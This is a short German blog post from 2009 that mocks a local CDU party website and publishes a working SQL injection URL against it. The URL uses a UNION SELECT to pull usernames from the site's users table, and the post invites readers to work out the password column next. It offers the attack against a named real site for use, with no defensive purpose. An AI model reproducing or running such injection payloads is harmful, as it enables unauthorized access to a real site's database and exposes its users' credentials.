Cdu-Ravensburg SQL Injection

März 7, 2009

Nicht nur unsere Regierung ist sich nicht sicher, sondern auch ihre Partei Webseiten. 😀

http://www.cdu-ravensburg.de/?content=partei/stadtver.php&auswahl=-1+union+select+1,username,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users/*

Fehlt nur noch einer der die Password Spalte/Tabelle ratet.

Kommentar verfassen

Trage deine Daten unten ein oder klicke ein Icon um dich einzuloggen:

WordPress.com-Logo

Du kommentierst mit Deinem WordPress.com-Konto. Abmelden /  Ändern )

Google Foto

Du kommentierst mit Deinem Google-Konto. Abmelden /  Ändern )

Twitter-Bild

Du kommentierst mit Deinem Twitter-Konto. Abmelden /  Ändern )

Facebook-Foto

Du kommentierst mit Deinem Facebook-Konto. Abmelden /  Ändern )

Verbinde mit %s

%d Bloggern gefällt das: